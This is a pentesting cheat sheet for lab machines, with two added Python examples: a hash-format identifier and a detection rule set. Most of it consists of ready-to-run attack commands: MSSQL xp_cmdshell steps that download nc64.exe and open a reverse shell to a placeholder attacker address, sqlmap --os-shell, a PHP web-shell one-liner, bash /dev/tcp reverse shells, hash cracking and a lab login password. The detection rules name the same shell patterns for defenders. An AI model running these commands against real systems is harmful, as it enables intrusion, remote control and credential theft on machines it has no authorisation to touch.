Pentesting tools and useful commands

GTFOBins — list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Kali OS

Select Network Repositories

echo "deb kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list

More stable:

echo "deb kali-last-snapshot main contrib non-free" | sudo tee /etc/apt/sources.list

Install all tools:

sudo apt install -y kali-linux-large

Install GUI:

sudo apt install -y kali-win-kex

GUI documentation. Run the GUI (press F8 to leave full-screen mode):

kex --win -s

Wappalyzer — browser extension to see the technologies used on websites.


Connect to the lab VPN in the background:

sudo openvpn --config vpn.ovpn --daemon

The VPN interface (tun0 or tun1) can be checked with the ifconfig command; take a tunnel down with:

sudo ifconfig tun1 down

Search for web directories and files on a site:

dirsearch -u http://october.metaltech.stf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt


Start Responder (LLMNR/NBT-NS/mDNS poisoner) on the VPN interface:

sudo responder -I tun0

John the Ripper

zip2john {archive.zip} > hashes
john -w=/usr/share/wordlists/rockyou.txt hashes

Identify possible hashes

hashid 2cb42f8734ea607eefed3b70af13bbd3

Crack hash

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
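Added example, not part of these notes and not hashid's own code: a minimal hash-format identifier in the spirit of hashid. It shows why the hashcat -m mode has to be picked before cracking and why a bare 32-hex digest is ambiguous (MD5 and NTLM share the length, so both candidates are returned). The hashcat mode numbers are the well-known ones for these formats; the sample inputs are constructed digests of the word "example" and a syntactically valid but meaningless bcrypt string.

```python
import hashlib
import re

# Candidate formats, ordered so that prefix-tagged (unambiguous) formats come
# first and bare hex digests, identified by length alone, come last.
# Each entry: (algorithm name, compiled regex, hashcat -m mode).
CANDIDATES = [
    ("bcrypt",      re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), 3200),
    ("sha512crypt", re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$"), 1800),
    ("md5crypt",    re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$"),   500),
    # bare hex digests: several may match the same input
    ("MD5",     re.compile(r"^[0-9a-f]{32}$", re.I), 0),
    ("NTLM",    re.compile(r"^[0-9a-f]{32}$", re.I), 1000),
    ("SHA-1",   re.compile(r"^[0-9a-f]{40}$", re.I), 100),
    ("SHA-256", re.compile(r"^[0-9a-f]{64}$", re.I), 1400),
    ("SHA-512", re.compile(r"^[0-9a-f]{128}$", re.I), 1700),
]


def identify(hash_str):
    """Return [(algorithm, hashcat_mode), ...] for every candidate whose
    pattern matches; an empty list means the string is not a recognised
    format (or is truncated / has stray characters)."""
    h = hash_str.strip()
    return [(name, mode) for name, rx, mode in CANDIDATES if rx.match(h)]


def hashcat_modes(hash_str):
    """Only the -m values, in the order a practitioner would try them."""
    return [mode for _, mode in identify(hash_str)]


# Constructed samples (not real credentials): digests of the word "example"
# plus a bcrypt-shaped string built from a repeated character.
SAMPLES = {
    "md5":    hashlib.md5(b"example").hexdigest(),
    "sha1":   hashlib.sha1(b"example").hexdigest(),
    "sha256": hashlib.sha256(b"example").hexdigest(),
    "bcrypt": "$2b$12$" + "a" * 53,
    "junk":   "not-a-hash",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:7} {value[:20]:<22} -> {identify(value)}")
```

When the identifier returns more than one candidate, try the modes in order; hashcat rejects a hash whose length does not fit the selected mode, so the wrong guess fails fast rather than silently.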

Pentesting MSSQL

MSSQL Injection Cheat Sheet

Impacket MSSQL client

impacket-mssqlclient ARCHETYPE/{username}@{TARGET_IP} -windows-auth
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget {file_url} -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe <YOUR_IP_ADDRESS> 443"

sqlmap

sqlmap -u '{target_url}' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo'
sqlmap -u '{target_url}' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo' --os-shell

winPEAS (Windows Privilege Escalation)

linPEAS (Linux Privilege Escalation)

Evil-WinRM

evil-winrm -i {TARGET_IP} -u administrator -p badminton


Nmap: service/version scan, the same with default scripts, and a fast full-port scan:

sudo nmap -sV {TARGET_IP}

sudo nmap -sV -sC {TARGET_IP}

sudo nmap -p- --min-rate 5000 -sV {TARGET_IP}


go install
git clone
gobuster dir --url {target_url} --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir --url {target_url} --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb


mysql -h {TARGET_IP} -u root
SHOW databases; : Prints out the databases we can access.
USE {database_name}; : Set to use the database named {database_name}.
SHOW tables; : Prints out the available tables inside the current database.
SELECT * FROM {table_name}; : Prints out all the data from the table {table_name}.


smbclient -N -L \\\\{TARGET_IP}\\
-N : No password
-L : List the shares (services) available on the server

Fully interactive shells

Simple PHP Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Reverse Shell

printf '#!/bin/bash\nbash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1' > {output_file.sh}


bash -c "bash -i >& /dev/tcp/{your_IP}/1337 0>&1"

Start netcat listener

nc -nvlp 1337

Start Web Server

python3 -m http.server 8000

Functional shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Upgrade shell

script /dev/null -c bash
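Added example, not part of these notes: the same shell-upgrade and remote-execution commands listed on this page (the PHP one-liner, the bash /dev/tcp reverse shell, the netcat -e shell, pty.spawn, script /dev/null -c bash, and xp_cmdshell from the MSSQL section), seen from the defender's side. The rule set below flags those patterns when they turn up in collected command lines (bash history, auditd execve records, EDR process telemetry, SQL audit logs). The rule names and the sample command lines are constructed for the example.

```python
import re

# Each rule: (name, regex). Patterns are deliberately narrow so that ordinary
# use of nc, script or python does not trip them.
RULES = [
    ("bash-dev-tcp-reverse-shell", re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/")),
    ("netcat-exec-shell",          re.compile(r"\b(nc|ncat|netcat|nc64\.exe)\b.*\s-e\s")),
    ("pty-shell-upgrade",          re.compile(r"pty\.spawn\(")),
    ("script-tty-upgrade",         re.compile(r"\bscript\s+/dev/null\s+-c\b")),
    ("php-webshell-write",         re.compile(r"<\?php.*\bsystem\(\s*\$_(GET|POST|REQUEST)\[")),
    ("mssql-xp_cmdshell",          re.compile(r"\bxp_cmdshell\b", re.I)),
]


def scan_commands(lines):
    """Return [(line_number, rule_name, line), ...] for every line that
    matches a rule; a line matching several rules is reported once per rule."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((n, name, line))
    return findings


# Constructed sample command lines (addresses and paths are made up).
# Lines 1, 5 and 8 are benign: a plain listener without -e is not flagged.
SAMPLE_COMMANDS = [
    "ls -la /var/www/html",
    'bash -c "bash -i >& /dev/tcp/10.0.0.5/1337 0>&1"',
    "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "script /dev/null -c bash",
    "nc -nvlp 1337",
    "echo '<?php system($_GET[\"cmd\"]); ?>' > /var/www/html/shell.php",
    "EXEC xp_cmdshell 'whoami'",
    "tar czf backup.tgz /etc",
]

if __name__ == "__main__":
    for n, rule, line in scan_commands(SAMPLE_COMMANDS):
        print(f"line {n}: {rule:28} {line}")
```

xp_cmdshell is disabled by default on SQL Server, so a separate rule on `sp_configure 'xp_cmdshell'` catches the moment it is switched on, which usually precedes the first command in the MSSQL section above.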